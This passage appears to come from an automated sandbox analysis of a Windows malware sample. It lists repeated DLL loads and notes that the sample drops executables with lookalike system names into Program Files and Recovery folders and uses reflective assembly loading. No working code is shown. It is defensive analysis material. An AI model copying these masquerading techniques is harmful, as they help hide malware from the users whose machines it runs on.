Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: version.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: version.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: mscoree.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: kernel.appcore.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: version.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: uxtheme.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: wldp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: amsi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: userenv.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: profapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: windows.storage.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptsp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rsaenh.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptbase.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: sspicli.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ktmw32.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rasapi32.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rasman.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rtutils.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: mswsock.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: winhttp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: iphlpapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: dnsapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: winnsi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rasadhlp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDirectory created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDirectory created: C:\Program Files\Windows Multimedia Platform\9e60a5f7a3bd80Jump to behavior
                    Source: JNKHlxGvw4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: JNKHlxGvw4.exeStatic file information: File size 1560958 > 1048576
                    Source: JNKHlxGvw4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.pdb source: JNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: JNKHlxGvw4.exe, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: lsass.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
